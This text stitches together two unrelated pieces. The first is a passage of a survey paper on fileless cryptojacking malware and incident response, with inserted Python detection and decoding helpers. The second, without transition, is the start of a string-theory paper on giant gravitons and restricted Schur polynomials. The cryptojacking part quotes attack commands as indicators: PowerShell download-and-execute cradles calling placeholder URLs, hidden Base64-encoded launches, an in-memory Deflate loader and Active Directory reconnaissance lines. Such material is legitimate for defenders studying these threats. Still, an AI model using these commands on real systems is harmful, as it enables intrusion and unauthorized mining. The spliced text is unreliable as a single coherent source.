Additionally, the WMI event filter can execute a malicious command after an uptime period \cite{bulazel2017survey, kumar2020emerging}. For example, Empire \cite{9092030}, an open-source PowerShell post-exploitation framework, has a feature to create a permanent WMI event subscription \cite{PowerShellempire}.
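The registry- and WMI-based persistence described above typically stores command lines carrying a recognizable set of PowerShell flags. A simplified hunting heuristic over collected autorun or WMI-consumer values could score them as below; the pattern list is an illustrative assumption and far from exhaustive.

```python
import re

# Sketch: score an autorun/WMI-consumer command line by counting common
# fileless-persistence indicators. Patterns are illustrative only.
SUSPICIOUS = [
    r"-enc(odedcommand)?\b",                       # Base64-encoded payload
    r"-nop\b|-noprofile\b",                        # skip profile scripts
    r"-w(indowstyle)?\s+hidden",                   # hide the console window
    r"downloadstring|invoke-expression|\biex\b",   # download cradle / eval
]

def persistence_score(cmdline: str) -> int:
    c = cmdline.lower()
    return sum(bool(re.search(p, c)) for p in SUSPICIOUS)
```

Values scoring above a site-specific threshold would be queued for analyst review rather than blocked outright, since administrators also use some of these flags legitimately.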
\subsection{Privilege escalation}
Once threat actors gain higher-level administrator privileges, they can move through the network and execute remote commands successfully. Bypassing User Account Control (UAC) is one of the common methods \cite{MitreUAC, loman2019ransomware}. In order to gain local admin or domain admin privileges, they can hijack legitimate Microsoft programs and processes that have an inherent auto-elevate feature, which means unprivileged users can run these processes with elevated privileges.
The other common technique is ``dumping credentials'' \cite{MitreDump}. In Windows, the Security Accounts Manager (SAM) database stores credentials together with the ``lsass.exe'' process. The SAM hive contains the credentials of logged-in or created domain users and admins. Note that threat actors target admin credentials or special users such as help desk employees, who have more privileges than regular users. After dumping credentials and obtaining password hashes, attackers can use the ``Pass the Hash'' technique \cite{Mitrepass} to authenticate without a password. In the ``Pass the Ticket'' method, adversaries hijack an Active Directory domain controller and generate a new Kerberos golden ticket. The golden ticket can impersonate any account on the domain, which grants indefinite privileges. Additionally, some open-source tools such as Mimikatz can export cached plaintext passwords or authentication certificates from memory. Besides that, if attackers fail to obtain passwords using the techniques above, they can use keyloggers on the compromised endpoint.
\subsection{Lateral Movement}
Lateral movement techniques help threat actors reach other endpoints, especially domain controllers and databases \cite{baldin2019best}. This gives attackers an advantage against detection because they can hide in the other endpoints \cite{tian2019real}. Therefore, data exfiltration, ransomware, or cryptojacking can happen later, even after the first detection and incident response.
Common lateral movement activity starts with reconnaissance in the victim environment. Legitimate network mapping tools can accompany fileless malware; for example, adfind.exe is commonly used to map victim networks in fileless attacks \cite{adfind}, specifically in Cobalt Strike attacks \cite{tremdmicro2021}. Threat actors have been observed exporting usernames, endpoint names, and subnets, as seen in the sample commands below, which were run from a batch file \cite{adfind}:
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}{python}
adfind.exe -f (objectcategory=person) > ad_users.txt
adfind.exe -f (objectcategory=computer) > ad_comps.txt
adfind.exe -f (objectcategory=subnet) > subnets.txt
\end{minted}
}
\end{tcolorbox}
After mapping a network and determining the valuable assets, attackers can move laterally on the network using the credentials obtained in the privilege escalation phase \cite{tian2019real}. Attackers can also exploit the well-known EternalBlue SMB vulnerability, which allows remote code execution on Windows systems and thereby lets malware propagate to other systems on the same network \cite{nakashima2017nsa}.
\subsection{Command and Control (C2 Server Connection)}
After all phases above, attackers can control some or all endpoints using C2s for remote command execution. Some adversaries may use remote desktop applications with direct GUI control in a victim network. Attackers can stay in a victim network to conduct ransomware or cryptojacking, sometimes for weeks.
\section{Background of Cryptojacking (Coinminer Malware)}
Cryptojacking is the unauthorized use of a computing device to mine cryptocurrency \cite{Hong2018,varlioglu2020cryptojacking, Eskandari2018}.
There are three types of cryptojacking attacks: in-browser cryptojacking, in-host cryptojacking, and in-memory fileless cryptojacking.
\subsection{In-browser Cryptojacking:}
In this technique, cryptojackers embed malicious code into a web page to perform mining. It is also called drive-by cryptojacking and can affect even mobile devices through trojans hidden in downloaded apps \cite{malwarebytes2021crypto}. Moreover, attackers can inject those scripts in obfuscated form into a compromised website that is known as a trusted source \cite{tahir2019browsers}. Since cryptojacking becomes profitable when a user remains on a website longer than 5.53 minutes \cite{Papadopoulos2019}, mining scripts are primarily observed on free movie or gaming websites. Furthermore, with WebSocket, WebAssembly \cite{hilbig2021empirical}, and WebWorker technology, the connection can be made more robust to increase the mining ability \cite{varlioglu2020cryptojacking}.
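The break-even figure lends itself to a trivial dwell-time screen; actual profitability would further depend on the victim's hash rate and the coin's exchange rate, which are deployment-specific assumptions not modeled here.

```python
# Sketch: dwell-time screen based on the ~5.53-minute break-even point
# reported for in-browser mining; real profitability also depends on the
# victim's hash rate and the coin's price (not modeled here).
BREAK_EVEN_MINUTES = 5.53

def mining_likely_profitable(dwell_seconds: float) -> bool:
    return dwell_seconds / 60.0 >= BREAK_EVEN_MINUTES
```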
Coinhive was a company that provided a script to enable website owners to mine the Monero cryptocurrency \cite{monero} starting in 2017. It was widely exploited and injected into websites within a few months \cite{Musch2018}; 81\% of cryptojacking websites used scripts provided by Coinhive between 2017 and 2019 \cite{Saad2018}. Symantec reported that Coinhive's script ``statdynamic.com/lib/crypta.js'' was even found in the Microsoft Store \cite{Guo2019}. On March 8, 2019, Coinhive stopped its service, and unauthorized in-browser cryptojacking activities decreased by 99\% in the first quarter of 2020 \cite{varlioglu2020cryptojacking}. However, Symantec reported that in-browser cryptojacking increased by 163\% after the second quarter of 2020 \cite{Symantec2020c}.
\subsection{In-host Cryptojacking:}
Cryptojacking can run as a traditional malware in a victim endpoint. For example, an attachment of a phishing email can infect a computer by loading crypto mining code directly into the disk \cite{trendmicro2019c}.
\subsection{In-memory Fileless Cryptojacking:}
Memory-based cryptojacking relies on fileless threat techniques, running entirely in memory and exploiting the WMI or PowerShell tools for execution \cite{handaya2020machine}. It also uses registry-resident persistence techniques. It is more dangerous than in-browser and in-host cryptojacking attacks because its evasion and persistence techniques are more sophisticated \cite{handaya2020machine}. Since fileless threats can give attackers command and control abilities through backdoors \cite{moussaileb2021survey}, a fileless cryptojacking attack can be converted into a ransomware attack. This threat is examined in Section~\ref{sectionNewTrend}.
\section{New Trend: Fileless Cryptojacking Malware}\label{sectionNewTrend}
As shown in Fig.~\ref{fig3}, similar to fileless ransomware attacks \cite{moussaileb2021survey}, cryptojackers use open-source attack frameworks (Phase 1) to deliver malicious scripts through phishing emails or vulnerability exploitation (Phase 2). They leverage open-source security tools such as Mimikatz and exploit legitimate tools like PowerShell, WMI subscriptions, and Microsoft macros to execute the payload in memory (Phase 3), and they create scheduled tasks as a persistent mechanism (Phase 4) with continuous downloads of malicious scripts \cite{sophos2019c}. Attackers want the malicious connection to remain so they can spread throughout the network by escalating privileges (Phase 5) and exploiting common weaknesses such as the EternalBlue SMB vulnerability \cite{nakashima2017nsa} or RDP brute-forcing (Phase 6). This provides the cryptojackers with large pools of CPU resources (Phase 7) in victim enterprises, turning endpoints into efficient cryptocurrency mining slaves (Phase 8) \cite{sophos2019c} that generate illicit profit in cryptocurrencies (Phase 9).
\begin{figure}
\centering
\includegraphics[width=1.00\linewidth]{figure2.png}
\caption{Fileless cryptojaking malware workflow.}
\label{fig3}
\end{figure}
A fileless cryptojacking attack can start with phishing emails, zero-day vulnerability exploitation, or hidden scripts on malicious websites~\cite{trendmicro2019b}. PowerShell commands connecting to malicious payload sources are observed, as in the sample command below:
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}{python}
PowerShell.exe -nop -exec bypass -c
"IEX (New-Object Net.WebClient).DownloadString(<URL>)"
\end{minted}
}
\end{tcolorbox}
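Command lines of this shape can be caught with a simple signature. A minimal regex sketch follows; it matches only the plain cradle shown above and would miss obfuscated variants (string concatenation, aliasing, and so on).

```python
import re

# Sketch: match the plain PowerShell "download cradle" pattern
# (New-Object Net.WebClient).DownloadString(...). Obfuscation defeats it.
CRADLE = re.compile(
    r"new-object\s+(system\.)?net\.webclient.*?downloadstring",
    re.IGNORECASE | re.DOTALL,
)

def is_download_cradle(cmdline: str) -> bool:
    return bool(CRADLE.search(cmdline))
```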
Cryptojackers exploit PowerShell to execute malicious commands remotely, straight in memory, to bypass antivirus systems. They can also encode these commands using Base64, a binary-to-text encoding scheme operating on sequences of 8-bit bytes, as in the sample command below \cite{Purple3}.
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}{python}
powershell.exe -nop -exec bypass -Enc
<Base-64 encoded script>
\end{minted}
}
\end{tcolorbox}
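PowerShell's \texttt{-Enc} flag takes the Base64 of the script's UTF-16LE bytes, so captured values can be decoded mechanically. A small helper pair, intended for analysis of logged commands rather than payload building:

```python
import base64

# PowerShell's -EncodedCommand expects Base64 over UTF-16LE bytes.
def ps_encode(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def ps_decode(b64: str) -> str:
    return base64.b64decode(b64).decode("utf-16-le")

# Example: the command 'dir' encodes to 'ZABpAHIA'.
```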
After infection, the endpoints report the status of the connection and the mining activity to the attackers' Command \& Control (C2) servers. Attackers can also run remote commands for other purposes such as data exfiltration or ransomware; this is another dangerous face of fileless cryptojacking compared with traditional cryptojacking techniques. Lateral movement routines are observed for spreading in victim networks \cite{Powershell1}. Following the fileless threat pattern, fileless cryptojacking also uses scheduled tasks or registry keys such as ``Run'' or ``RunOnce'' for malware propagation, and cryptojackers can store PowerShell commands under scheduled tasks and registry keys. System information is important for running cryptojacking scripts; thus, the commands can collect computer names, GUIDs, MAC addresses, OS versions, and timestamp information. In the final stage, victim endpoints become mining slaves of the deployers or mining pools for the illicit gains of cryptojackers.
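For signature writing, it helps to enumerate the host attributes such beacons typically carry. A benign sketch of the same collection (the field names are illustrative; collection itself is harmless, and only the exfiltration step is malicious):

```python
import platform
import socket
import time
import uuid

# Sketch: the host attributes fileless coinminers are reported to beacon
# to C2 servers -- enumerated here only to inform detection signatures.
def beacon_fields() -> dict:
    return {
        "hostname": socket.gethostname(),
        "os": platform.system(),
        "mac": f"{uuid.getnode():012x}",   # MAC-derived node id
        "timestamp": int(time.time()),
    }
```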
\subsection{Common Fileless Cryptojacking Malware in the Wild}
\subsubsection{Purple Fox}
It is originally known as fileless downloader malware that leaves a small footprint to avoid detection. It is also widely used for fileless cryptojacking, delivering mining scripts, as well as for ransomware purposes. It can be delivered through a vulnerability exploitation or a malicious webpage that hosts HTML Application (.hta) files, which trigger PowerShell to run and execute the Purple Fox fileless backdoor trojan \cite{Purple1, Purple2}. Commonly, the trojan presents itself as an image (.png) file and exploits the MsiMake parameter of PowerShell to run msi.dll and execute the Purple Fox malware \cite{Purple1}. Sample observed PowerShell scripts \cite{Tweetpurple, Purple1}:
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}{python}
powershell.exe -c "iex((new-object Net.WebClient).
DownloadString(<URL>))"
\end{minted}
}
\end{tcolorbox}
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}{python}
-nop -exec bypass -c "IEX (New-Object Net.WebClient).
DownloadString(<Domain1>/Png1.PNG);
MsiMake <Domain2>/Png2.PNG>)"
\end{minted}
}
\end{tcolorbox}
Purple Fox can also attempt to elevate privileges and move through a victim network by conducting automatic SMB brute-force attacks (on ports 445, 135, and 139) \cite{Purple2}, scanning randomly generated IP blocks, as seen in a sample IoC below:
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}{python}
netsh.exe ipsec static add filter filterlist=Filter1
srcaddr=any dstaddr=Me dstport=445 protocol=UDP
\end{minted}
}
\end{tcolorbox}
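The scanning behavior above (one host probing SMB ports across many addresses) is visible in network flow telemetry. A threshold-based sketch follows; the flow-tuple format and the threshold are illustrative assumptions.

```python
from collections import defaultdict

# Sketch: flag sources contacting many distinct hosts on SMB-related
# ports (445/135/139), as in Purple Fox's brute-force propagation.
SMB_PORTS = {445, 135, 139}

def smb_scanners(flows, min_targets=20):
    """flows: iterable of (src_ip, dst_ip, dst_port) tuples."""
    targets = defaultdict(set)
    for src, dst, port in flows:
        if port in SMB_PORTS:
            targets[src].add(dst)
    return {src for src, dsts in targets.items() if len(dsts) >= min_targets}
```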
To remain operational even after a reboot, it can create persistent mechanisms by using PowerSploit, an open-source penetration testing tool \cite{PowerSploit}.
\subsubsection{GhostMiner}
GhostMiner is powerful fileless cryptojacking malware \cite{block2019windows}, observed in 2018, with high-level evasion techniques \cite{caldwell2018miners}. GhostMiner exploits WMI objects, as is routine for fileless threats, as a persistent mechanism \cite{GhostMiner1} to mine the Monero cryptocurrency (XMR) continuously.
It creates a WMI event filter to deploy the persistent mechanism and installs a WMI class named ``PowerShell\_Command'' \cite{GhostMiner1}. The malicious WMI class stores Base64-encoded commands, as seen below \cite{GhostMiner1}:
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}{python}
-NoP -NonI -EP ByPass -W Hidden -E <Base64 encoded script>
\end{minted}
}
\end{tcolorbox}
Furthermore, it disables other cryptojacking malware like PCASTLE on victim endpoints in order to use their resources at the maximum level \cite{GhostMiner1}.
\subsubsection{Lemon Duck}
Lemon Duck first appeared in 2019 with an effective lateral movement capability in victim networks, exploiting the EternalBlue SMB vulnerability \cite{Lemon1}. Lemon Duck can infect Linux operating systems and IoT devices as well \cite{palmer2021successful}. It also uses Mimikatz to dump credentials and adfind.exe to scan Active Directory, and attempts many other techniques such as task scheduling, registry exploitation, and WMI subscriptions for its persistent mechanism \cite{lemon2}.
Below is a sample Lemon Duck PowerShell command that also invokes a `bpu' function.
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}{python}
powershell.exe -w hidden IEX(New-Object Net.WebClient).
DownloadString(<URL1>); bpu (<URL2>)
\end{minted}
}
\end{tcolorbox}
The "bpu" function is used a wrapper to download and execute payloads while disabling Windows Defender real-time detection in a Lemon Duck crypto mining activity \cite{lemon3}.
\subsubsection{PCASTLE}
PCASTLE is similar to the other fileless cryptojacking malware in abusing PowerShell to hijack legitimate processes and exploiting the EternalBlue SMB vulnerability to mine. When it moves through a victim network for propagation, a scheduled task or a RunOnce registry key is executed to download a PowerShell script that accesses another URL to download the actual malicious payload and build a Command and Control connection \cite{PCASTLE1}. It uses the open-source Invoke-ReflectivePEInjection tool \cite{Invoke} to inject itself into the memory of the PowerShell process, as seen in the compressed, Base64-encoded command below \cite{PCASTLE1}:
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}[xleftmargin=-12pt]{python}
Invoke-Expression $(New-Object IO.StreamReader
($(New-Object IO.Compression.DeflateStream
($(New-Object IO.MemoryStream
(,$([Convert]::FromBase64String('<Base64 encoded code>')))),
[IO.Compression.CompressionMode]::Decompress)),
[Text.Encoding]::ASCII)).ReadToEnd();
\end{minted}
}
\end{tcolorbox}
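The decoding chain above (Base64 decode, then DeflateStream inflation, then evaluation) can be reproduced outside PowerShell when analyzing captured commands. A Python equivalent, using zlib with a negative window size for header-less (raw) DEFLATE as DeflateStream produces:

```python
import base64
import zlib

# Sketch: mirror of the PowerShell DeflateStream pipeline for analysts.
def inflate_b64(b64: str) -> str:
    raw = base64.b64decode(b64)
    return zlib.decompress(raw, -15).decode("ascii")  # -15 = raw DEFLATE

def deflate_b64(text: str) -> str:
    co = zlib.compressobj(9, zlib.DEFLATED, -15)
    data = co.compress(text.encode("ascii")) + co.flush()
    return base64.b64encode(data).decode("ascii")
```

`inflate_b64` recovers the plaintext script from a captured `FromBase64String` argument; `deflate_b64` is the inverse, included for testing.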
\subsubsection{WannaMine}
WannaMine uses WannaCry's exploitation code and exploits the ``EternalBlue'' SMB vulnerability \cite{nakashima2017nsa} to drop and propagate mining malware \cite{wannamine}. It follows fileless techniques (so-called all-in-memory malware), hijacking legitimate Windows processes and exploiting the PowerShell and WMI tools.
\section{Digital Forensics and Incident Response (DFIR) on Fileless Cryptojacking Malware}
\begin{table*}[h]
\caption{A threat hunting-oriented DFIR approach for fileless cryptojacking attacks.}
\begin{center}
\begin{tabular}{ l l }
\hline
\textbf{Phase}& \textbf{Action}
\\ \hline
Threat Intelligence & Collect IoCs and TTPs (IP, Domain, URL, Hash, Command, Tool)\\
Threat Hunting & Search and Find the IoCs and TTPs on Endpoints or Network Traffic\\
Isolation (1) & Cut the Network Traffic on Detected Endpoint/s\\
Identification (1) & Validate whether the Detection is True Positive\\
Identification (2) & Find the C2 Connections or Cryptominer Processes or Connections to Mining Pools\\
Identification (3) & Check Firewall whether the C2 Connections or Mining Connections Exist in the Other Endpoints\\
Isolation (2) & Cut the Network Traffic on Detected Endpoint/s by Firewall C2 Filter\\
Identification (4) & Find New C2 Connections on New Detected Endpoints and > Isolation (2) \\
Identification (5) & Find the Patient Zero (Entry Point)\\
Containment & Block All Detected Malicious Connections and Hash Values Isolating the Affected Endpoints\\
Evidence Acquisition & Acquire Sample Network Traffic Capture; Memory Image; Registry Dump; Event Logs; New Files, Master File Table (MFT)\\
Evidence Preservation & Generate the Hash Values of Collected Files with Timestamps\\
Eradication & Destroy Malicious Artifacts and Persistent Mechanism \\
Identification (6) & Find Persistent Mechanism If Endpoints still Attempt to Connect C2 or Mining Pool\\
Remediation & Patch The Vulnerability If the Entry Point Experienced an Exploitation, Erase Other Leftovers\\
Evidence Examination & Analyze PowerShell Logs, Event Logs, SMB Logs; Registry Keys; Memory Timeline; New Files, Master File Table (MFT)\\
Report & Write a Report to Present Results and Improve Security Posture\\
Feed & Convert Collected Information to Threat Intelligence and Threat Hunting Actions in the DFIR Cycle\\
\hline
\end{tabular}
\label{table1}
\end{center}
\end{table*}
As fileless threats increase, in-host detection is becoming more important, and DFIR interventions are now combined with threat intelligence and threat hunting. Detecting and blocking C2 connections requires strong behavior-monitoring capabilities or a continuous threat intelligence feed to conduct effective threat hunting, especially in large organizations.
Threat intelligence and hunting reports \cite{Purple1, Purple2, GhostMiner1, Lemon1, PCASTLE1} show that patterns in PowerShell commands and in the hijacked calling-out processes are effective detection elements. Thus, auditing ``Process Creation'' and ``Command Line'' activities \cite{Microsoft1} can increase visibility \cite{sumologic1}. In particular, auditing PowerShell commands and defining rules that match specific encoded or decoded commands can improve detection of fileless cryptojacking attacks.
As displayed in Table~\ref{table1}, we propose a new DFIR approach that combines threat intelligence and threat hunting steps, recategorizing the actions specifically for fileless cryptojacking. It can also be applied to fileless ransomware threats, in accordance with the techniques proposed in the literature \cite{shin2021twiti, mansfield2017fileless, bucevschi2019preventing, bahrami2019cyber, kumar2020emerging, boranaassistive, handaya2020machine}.
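The evidence preservation phase of Table~\ref{table1}, generating hash values of collected files with timestamps, can be sketched in a few lines. The function name and record format below are illustrative assumptions, not part of any specific forensic toolkit:

```python
import hashlib
from datetime import datetime, timezone

def preserve_evidence(paths):
    """Compute SHA-256 digests of acquired evidence files, recording a UTC
    timestamp for each so the chain of custody can be documented."""
    records = []
    for path in paths:
        digest = hashlib.sha256()
        with open(path, "rb") as handle:
            # Hash in chunks so large memory images do not have to fit in RAM.
            for chunk in iter(lambda: handle.read(65536), b""):
                digest.update(chunk)
        records.append({
            "file": path,
            "sha256": digest.hexdigest(),
            "hashed_at": datetime.now(timezone.utc).isoformat(),
        })
    return records
```

In practice the resulting records would be written to write-once storage so that the integrity of memory images, registry dumps, and MFT copies can later be verified.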
In a traditional intrusion response, the incident responder's first goals are to identify C2 connections, establish the scope of the attack, and find the entry point (patient zero). However, the response can be made more proactive by feeding results back into the threat hunting and threat intelligence steps. Specifically, threat hunting on the initial access is crucial. Threat hunting on publicly available servers is another important point, because exploited zero-day vulnerabilities such as Log4j (CVE-2021-44228) can allow adversaries to run their scripts for cryptojacking or ransomware. Moreover, attackers can access the internal network directly if a vulnerable endpoint is not isolated in the DMZ (demilitarized zone), which makes lateral movement inside the victim organization's network easier.
Threat hunting against fileless threats should cover commonly exploited legitimate tools such as adfind.exe, psexec.exe, nmap, certutil, and bitsadmin, as well as base64-encoded/decoded PowerShell commands. As an example, the command fragments below are commonly used in fileless malware attacks built on the Cobalt Strike attack framework \cite{slowik2018anatomy,bahrami2019cyber}:
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}[xleftmargin=0pt]{powershell}
powershell.exe -nop -w hidden -encodedcommand JABz...
\end{minted}
}
\end{tcolorbox}
\begin{tcolorbox}[colback=bg,boxrule=-4pt,arc=0pt]
{
\scriptsize
\begin{minted}[xleftmargin=0pt]{powershell}
powershell.exe -nop -w hidden -c
"IEX ((new-object net.webclient).DownloadString(<C2>))"
\end{minted}
}
\end{tcolorbox}
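A minimal hunting rule for command fragments like these can be sketched as follows. The patterns below are illustrative assumptions, not a complete rule set; real deployments would use tuned detections over audited ``Process Creation'' and ``Command Line'' events:

```python
import base64
import re

# Illustrative patterns for suspicious PowerShell launches seen in fileless
# attacks (hidden window, no profile, encoded command, download cradle).
SUSPICIOUS_FLAGS = re.compile(
    r"-nop\b|-w(?:indowstyle)?\s+hidden|-enc(?:odedcommand)?\b", re.IGNORECASE
)
DOWNLOAD_CRADLE = re.compile(
    r"IEX\s*\(|Invoke-Expression|DownloadString", re.IGNORECASE
)
ENCODED_ARG = re.compile(r"-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def inspect_command_line(cmd):
    """Return the reasons a process command line looks suspicious."""
    reasons = []
    if "powershell" in cmd.lower() and SUSPICIOUS_FLAGS.search(cmd):
        reasons.append("hidden/encoded powershell flags")
    if DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download cradle")
    match = ENCODED_ARG.search(cmd)
    if match:
        try:
            # PowerShell -EncodedCommand takes base64 of UTF-16LE text.
            decoded = base64.b64decode(match.group(1)).decode("utf-16-le", "ignore")
            if DOWNLOAD_CRADLE.search(decoded):
                reasons.append("download cradle inside encoded command")
        except Exception:
            reasons.append("undecodable encoded payload")
    return reasons
```

Matching the decoded payload as well as the raw command line helps catch the \texttt{-encodedcommand} variant shown above.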
It is very useful to merge threat hunting and DFIR with threat intelligence. Twitter, in particular, has emerged as a dynamic and prompt interactive platform for this purpose \cite{shin2021twiti}, where individual threat hunters feed threat intelligence research with invaluable information. Our new ``Threat Hunting-oriented DFIR approach'' is a cycle created to meet new incident response (IR) needs from a digital forensics perspective, as shown in Table~\ref{table1}.
\section{Conclusion}
In this paper, we first conducted a comprehensive literature review of academic articles and industry reports on the new ``fileless cryptojacking'' threat. Our results show that all-in-memory fileless cryptojacking has not been investigated as thoroughly as in-browser or in-host cryptojacking, and this article attempts to provide a deep understanding of the problem. We also review the fundamentals of fileless threats, which can help ransomware researchers, because ransomware and cryptojacking are the most common threats in the wild and share similar patterns (Tactics, Techniques, and Procedures - TTPs). Following the fileless routine, all-in-memory cryptojacking and ransomware attacks reside only in memory (RAM) and run malicious scripts under legitimate processes in the Windows operating system, creating persistence mechanisms and performing lateral movement with PowerShell commands, WMI objects, scheduled tasks, and registry keys. In this context, this paper presents a new threat hunting-oriented DFIR approach with detailed phases, which can also help cybersecurity professionals who conduct digital forensics and incident response against fileless threats.
\bibliographystyle{IEEEtran}
The AdS/CFT correspondence \cite{1999TheLargeN,1998Gaugetheory,witten1998anti} claims an exact duality between ${\cal N}=4$ super Yang-Mills theory and string theory on spacetimes that are asymptotically AdS$_5\times$S$^5$. The correspondence can be used to map states in the string theory to operators in the Yang-Mills theory, and conversely. In this article we are interested in operators that have a bare dimension of order $N$ and correspond to giant graviton branes in the dual string theory \cite{2000Invasion,2000SUSY,2000Largebranes}. Giant gravitons are spherical branes that carry a D3-brane dipole charge. As usual, to construct excited D-brane states, we attach open strings to the brane. At low energy these open strings should be described by a Yang-Mills theory, so that the low energy dynamics of these operators should be captured by an emergent Yang-Mills theory \cite{2005DbranesInYangMills}. Our goal is to study the one loop dilatation operator acting on the operators dual to giant graviton branes, in order to test this idea. This was done in the leading large $N$ limit in \cite{2020EmergentYangMills}, and the result matches a free emergent Yang-Mills theory associated with the brane world volume dynamics. Our goal in this paper is to compute the first ${1\over N}$ correction, in order to learn about interactions.
The study of the action of the dilatation operator, at large $N$, on operators with a dimension of order $N$ is highly nontrivial \cite{2002GiantGravitons}. The large $N$ limit is usually dominated by planar diagrams, with higher genus ribbon graphs suppressed \cite{1974Aplanardiagram}. However, for operators of dimension of order $N$, the combinatorics of the Feynman diagrams can be used to show that the sheer number of non-planar diagrams overpowers the higher genus suppression. The usual large $N$ simplifications do not hold and new ideas are needed. We will follow the approach to this problem based on representation theory, developed in \cite{corley2002exact,2007GiantgravitonsI,2008ExactMultiMatrix,2007BranesAntiBranes,2008DiagonalMultiMatrix,2009DiagonalFreeField,2008EnhancedSymmetries,2008ExactMultiRestrictedSchur}. These works developed bases spanning the space of local gauge invariant operators of the model that diagonalize the two point functions of the free field theory exactly (i.e. to all orders in ${1\over N}$), while at low loop order these operators mix only weakly. Specifically, we will use the basis provided by the restricted Schur polynomials \cite{2008ExactMultiMatrix}.
Our approach entails evaluating the exact (to all orders in ${1\over N}$) action of the one loop dilatation operator and then expanding to extract the leading term and the first subleading correction. Even with the powerful representation theory methods, this is a problem of considerable complexity, so we will focus on a system of two giant gravitons. This corresponds to studying restricted Schur polynomials labeled by Young diagrams with two long columns. Since it plays a central role in our analysis, we briefly review the derivation of how the dilatation operator acts on the restricted Schur polynomials in Section \ref{Dact}. The leading large $N$ dilatation operator can be diagonalized analytically, with the eigenstates known as ``Gauss graph operators''. The construction of the Gauss graph operators is reviewed in Section \ref{GGBasis}. In Section \ref{emergentYM} we explain the identification of the Gauss graph operators with states in the Hilbert space of an emergent Yang-Mills theory. The discussion to this point deals with the leading contribution in the ${1\over N}$ expansion, which reproduces the free emergent Yang-Mills theory. Having set the stage, we then turn to the first subleading corrections, which represent interactions in the emergent Yang-Mills theory. To do this we calculate the exact action of the one loop dilatation operator in Section \ref{analyticsubleading}. Our computation involves three complex scalars and is therefore a generalization of similar computations presented in \cite{2010Emergentthree,2011Surprisingly}. This generalization is necessary because the operator mixing corresponding to interactions in the emergent Yang-Mills theory is not captured by the study of \cite{2010Emergentthree,2011Surprisingly}. Our final result for the interaction appears in Section \ref{sbldin}; this is the key result of this paper. Conclusions and discussion are given in Section \ref{discuss}.
The physics of how open strings and their dynamics emerges from ${\cal N}=4$ super Yang-Mills theory is a fascinating subject and there are by now many papers on this topic. We recommend \cite{2005QuantizingOpenSpin,2013OpenSpinChains,2015GiantGravitonsAndTheEmergence,berenstein2015central,2015ExcitedStates,berenstein2020open,2021OpenGiantMagnons,2022arXiv220211729B} and their references, for background.
\section{Action of the Dilatation Operator in Restricted Schur Polynomials basis}\label{Dact}
In this section we review the exact\footnote{i.e. to all orders in $1/N$.} action of the one loop dilatation operator on restricted Schur polynomials in the $SU(3)$ sector of $\mathcal{N}=4$ super Yang-Mills theory. The one loop dilatation operator \cite{2003TheBetheAnsatz} in this case reads
\begin{equation}
D=-\frac{2g_{YM}^2}{(4\pi)^2}\left([\phi_3,\phi_1][\partial_{\phi_{3}},\partial_{\phi_{1}}]+[\phi_{2},\phi_{1}][\partial_{\phi_{2}},\partial_{\phi_{1}}]+[\phi_{3},\phi_{2}][\partial_{\phi_{3}},\partial_{\phi_{2}}]\right)
\end{equation}
For convenience, we introduce the notation ($A,B=1,2,3$)
\begin{equation}
D\equiv -\frac{2g_{YM}^2}{(4\pi)^2} \sum_{A>B=1}^{3} D_{AB}
\end{equation}
where $D_{AB}$ mixes fields $\phi_A$ and $\phi_B$. We will consider the action of this dilatation operator on the restricted Schur polynomials\cite{2013JHEP...03..173D}
\begin{equation}
\begin{aligned}
\chi_{R,(\vec{r})\vec{\mu}\vec{\nu}}\left(\phi\right)&=\frac{1}{n_1 ! n_2 ! n_3 !}\sum_{\sigma \in S_{n_T}}\chi_{R(\vec{r})\vec{\mu}\vec{\nu}}(\sigma) \operatorname{Tr}\left(\sigma \phi_1^{\otimes n_1} \phi_2^{\otimes n_2} \phi_3^{\otimes n_3} \right)
\end{aligned}
\end{equation}
where $n_T=n_1+n_2+n_3$ and
\begin{equation}
\begin{aligned}
\operatorname{Tr}\left(\sigma \phi_1^{\otimes n_1} \phi_2^{\otimes n_2} \phi_3^{\otimes n_3} \right)=(\phi_1)_{i_{\sigma(1)}}^{i_1}\cdots (\phi_1)_{i_{\sigma(n_1)}}^{i_{n_1}}(\phi_2)_{i_{\sigma(n_1+1)}}^{i_{n_1+1}}\cdots (\phi_2)_{i_{\sigma(n_1+n_2)}}^{i_{n_1+n_2}}\\
\times (\phi_3)_{i_{\sigma(n_1+n_2+1)}}^{i_{n_1+n_2+1}}\cdots (\phi_3)_{i_{\sigma(n_1+n_2+n_3)}}^{i_{n_1+n_2+n_3}}
\end{aligned}
\end{equation}
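For a single matrix and trivial restriction, this construction reduces to an ordinary Schur polynomial, which provides a quick numerical check of the multi-trace formula above. The following sketch hard-codes the characters of the symmetric representation of $S_2$ (both equal to one); everything else follows from the fact that $\operatorname{Tr}(\sigma\,\phi^{\otimes n})$ factorizes into one trace per cycle of $\sigma$:

```python
from itertools import permutations

def mat_mul(a, b):
    n = len(a)
    return [[sum(a[i][k] * b[k][j] for k in range(n)) for j in range(n)] for i in range(n)]

def mat_pow(a, k):
    n = len(a)
    out = [[float(i == j) for j in range(n)] for i in range(n)]
    for _ in range(k):
        out = mat_mul(out, a)
    return out

def trace(a):
    return sum(a[i][i] for i in range(len(a)))

def multi_trace(sigma, phi):
    """Tr(sigma phi^{otimes n}): a product over the cycles of sigma
    of Tr(phi^{cycle length})."""
    seen, value = set(), 1.0
    for start in range(len(sigma)):
        if start in seen:
            continue
        length, k = 0, start
        while k not in seen:
            seen.add(k)
            k = sigma[k]
            length += 1
        value *= trace(mat_pow(phi, length))
    return value

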